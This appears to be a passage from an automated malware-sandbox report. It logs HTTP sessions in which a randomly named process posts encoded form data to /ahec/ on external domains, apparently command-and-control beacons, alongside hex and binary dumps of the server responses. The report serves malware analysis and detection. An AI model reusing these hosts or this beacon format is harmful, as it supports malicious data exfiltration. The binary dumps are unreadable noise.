                                                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 52 b1 4e c4 30 0c fd 15 6f b7 a0 e6 90 98 50 af 23 12 0b 0b 13 a3 db b8 6d 44 1a 17 c7 bd aa 7f 8f d3 d3 1d 27 40 6a 2a bd 17 fb 3d c7 76 3d ea 14 9b 7a 24 f4 4d ad 41 23 35 6f ac f0 c2 4b f2 b5 bb 10 b5 bb 5c b7 ec b7 a6 ee 28 29 89 a1 ff 8e 7d 61 b8 57 28 d0 fe 3f 21 8a 6d 24 e8 28 c6 19 bd 0f 69 38 3d 1e 77 98 67 ec 0a 3c c2 1a bc 8e a7 a7 e3 11 5a 16 4f 72 7a b4 b4 92 ea 9b 0f 5e 04 3c 4f 18 12 74 bc 44 0f c9 bc 5a 82 be d8 81 b1 25 a0 67 59 51 8a 38 b0 40 56 c2 a8 e3 3d bb 17 91 2b b8 56 f5 da c3 c6 0b 08 95 c7 c5 0d 32 69 21 04 12 4e 64 48 ce 24 f9 01 e6 48 98 09 56 0c 0a 08 3d ad 30 85 b4 28 65 40 33 57 d9 00 07 ab ac 82 77 9e 48 c3 64 17 42 59 51 b4 98 ee 82 ad f0 6a 7a 30 52 9c 73 f5 c7 ff 6b 09 62 8f 59 44 47 0b c2 9c 83 a5 a7 8e 6e de e7 90 cd bc 28 ed 3d 30 40 80 0a 35 c2 28 d4 9f 0e a3 ea fc ec dc ba ae 95 df 12 7a d6 aa e3 e9 d0 fc 22 6a 87 4d 65 f3 b5 a9 ba d2 5a b7 77 e4 67 4a 61 1a 20 4b 77 d3 9b 51 3e bb c8 8b bf 17 71 91 07 ae 86 d0 1f 4c e0 ba 16 ee b2 25 6e df ab 6f b5 21 96 59 5e 02 00 00
                                                                                                                                                            Data Ascii: mRN0oP#mD'@j*=v=z$MA#5oK\()}aW(?!m$(i8=wg<ZOrz^<OtDZ%gYQ8@V=+V2i!NdH$HV=0(e@3WwHdBYQjz0RskbYDGn(=0@5(z"jMeZwgJa KwQ>qL%no!Y^


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.449748104.21.18.253805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:50:56.404686928 CET467OUTGET /ahec/?XveXHZvx=IVKkGpXtV1toVTOD34k8KODusBBzLXjGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NJz1b7R1h7bgr87Q==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.poria.link
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686069965 CET1272INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:56 GMT
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0
                                                                                                                                                            Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvIm%2FfOCJu80AE09johpDoC0vPNlTq2pOycE5hCMsHfepwfpVoDz7ncCV2FyFw3s2BKTsr7ZAdhpSa9327B1tl8Z8XbIILoTeC%2F%2FCI2NbmmzjVY92UwpbskHia1ZsFUveQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 83257af2de4c258e-MIA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 32 35 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 62 72 3e 3c 62 72 3e 3c 62 72 3e 3c 62 72 3e 3c 62 72 3e 3c 62 3e 3c 62 69 67 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 69 67 3e 3c 2f 62 3e 3c 62 72 3e 3c 62 72 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 31 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 20 77 69 64 74 68 3d 34 30 30 20 62 6f 72 64 65 72 3d 31 3e 3c 74 72 3e 3c 74 64 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 6f 75 72 20 66 6f 72 77 61 72 64 69 6e 67 20 6f 72 20 73 74 65 61 6c 74 68 20 66 6f 72 77 61 72 64 69 6e 67 20 74 61 62 6c 65 73 2e 20 3c 62 72 3e 3c 62 72 3e 49 66 20 79 6f 75 20 72 65 63 65 6e 74 6c 79 20 73 65 74 20 79 6f 75 72 20 6e 61 6d 65 20 73 65 72 76 65 72 73 2c 20 70 6c 65 61 73 65 20 77 61 69 74 20 61 20 66 65 77 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 20 53 6f 6d 65 74 69 6d 65 73 20 72 65 73 74 61 72 74 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 68 65 6c 70 73 2e 3c 62 72 3e 3c 62 72 3e 49 66 20 79 6f 75 20 72 65 71 75 69 72 65 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2c 20 70 6c 65 61 73 65 20 76 69 73 69 74 20 6f 75 72 20 6d 61 69 6e 20 73 69 74 65 20 61 74 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 64 79 6e 61 64 6f 74 2e 63 6f 6d 27 3e 77 77 77 2e 64 79 6e 61 64 6f 74 2e 63 6f 6d 3c 2f 61 3e 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 62 72 3e 3c 62 72 3e 3c 69 6d 67 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 70 61 72 6b 63 6c 6f 75 64 2e 64 79 6e 61 64 6f 74 2e 63 6f 6d 2f 6c 6f 67 6f 2e 67 69 66 27 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: 25e<html><head><title>Not Found</title></head><body><center><br><br><br><br><br><b><big>Not Found</big></b><br><br><table cellpadding=10 cellspacing=0 width=400 border=1><tr><td>Your domain could not be found in our forwarding or stealth forwarding tables. <br><br>If you recently set your name servers, please wait a few minutes and try again. Sometimes restarting your browser helps.<br><br>If you require further assistance, please visit our main site at <a href='http://www.dynadot.com'>www.dynadot.com</a>.</td></tr></table><br><br><img src='http://parkcloud.dynadot.com/logo.gif'></center></body></html>
                                                                                                                                                            Dec 8, 2023 14:50:56.686326027 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            9192.168.2.44974937.140.192.89805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:02.564663887 CET747OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.makeinai.online
                                                                                                                                                            Origin: http://www.makeinai.online
                                                                                                                                                            Referer: http://www.makeinai.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 4a 55 4b 2b 42 65 36 4a 79 58 4f 56 50 79 43 65 39 6f 6f 68 56 4d 49 73 77 33 30 58 32 79 58 69 2f 6b 74 36 73 52 68 72 6c 50 55 2f 4d 56 78 65 59 30 67 6e 58 73 66 66 38 2b 68 72 2b 58 34 4e 65 43 32 36 52 58 2b 39 6c 6e 4f 58 59 65 43 49 41 65 56 37 75 68 6c 42 5a 2f 72 59 55 64 70 4c 63 2b 44 6f 39 31 37 48 51 4a 55 77 6d 6b 74 45 66 50 53 55 6c 53 75 4f 4c 74 37 77 70 73 50 31 39 68 32 6d 79 43 77 49 68 71 38 4a 78 49 45 69 49 57 47 76 52 4d 70 65 72 38 53 30 61 64 57 79 4a 7a 70 7a 37 51 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvRMper8S0adWyJzpz7Q==
                                                                                                                                                            Dec 8, 2023 14:51:02.846950054 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:02 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: W/"64f9f107-377d8"
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                                                                                                            Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                                                                                                            Dec 8, 2023 14:51:02.847130060 CET1286INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                                                                                                            Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                                                                                                            Dec 8, 2023 14:51:02.847446918 CET1286INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                                                                                                            Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                                                                                                            Dec 8, 2023 14:51:02.847461939 CET1286INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                                                                                                            Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                                                                                                            Dec 8, 2023 14:51:02.848145962 CET1286INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                                                                                                            Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                                                                                                            Dec 8, 2023 14:51:02.848288059 CET1286INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                                                                                                            Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                                                                                                            Dec 8, 2023 14:51:02.848998070 CET1286INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                                                                                                            Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                                                                                                            Dec 8, 2023 14:51:02.849178076 CET1286INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                                                                                                            Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                                                                                                            Dec 8, 2023 14:51:02.850562096 CET1286INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                                                                                                            Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                                                                                                            Dec 8, 2023 14:51:02.850574970 CET1286INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                                                                                                            Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                                                                                                            Dec 8, 2023 14:51:03.122236013 CET1286INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                                                                                                            Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.44975037.140.192.89805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:05.640383959 CET767OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.makeinai.online
                                                                                                                                                            Origin: http://www.makeinai.online
                                                                                                                                                            Referer: http://www.makeinai.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 50 33 53 2b 4e 5a 6d 4a 30 33 4f 57 44 53 43 65 7a 49 6f 6c 56 4d 45 73 77 31 59 48 32 41 7a 69 2f 46 64 36 76 54 4a 72 67 50 55 2f 55 6c 77 57 46 45 67 38 58 73 69 69 38 37 5a 72 2b 55 45 4e 65 48 79 36 51 6b 47 69 6b 33 4f 56 51 2b 43 4f 66 75 56 37 75 68 6c 42 5a 37 44 79 55 64 78 4c 63 50 54 6f 38 55 37 45 64 70 55 7a 6e 6b 74 45 55 76 54 38 6c 53 76 72 4c 6f 65 56 70 71 54 31 39 6c 36 6d 78 54 77 4a 75 71 38 4c 75 59 45 73 46 6a 7a 32 61 73 52 57 76 2b 6e 66 62 5a 76 5a 42 47 46 67 38 69 39 50 34 31 69 48 43 7a 4b 56 4c 4a 63 65 47 51 73 78 65 67 38 3d
                                                                                                                                                            Data Ascii: XveXHZvx=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2Azi/Fd6vTJrgPU/UlwWFEg8Xsii87Zr+UENeHy6QkGik3OVQ+COfuV7uhlBZ7DyUdxLcPTo8U7EdpUznktEUvT8lSvrLoeVpqT19l6mxTwJuq8LuYEsFjz2asRWv+nfbZvZBGFg8i9P41iHCzKVLJceGQsxeg8=
                                                                                                                                                            Dec 8, 2023 14:51:05.924487114 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:05 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: W/"64f9f107-377d8"
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 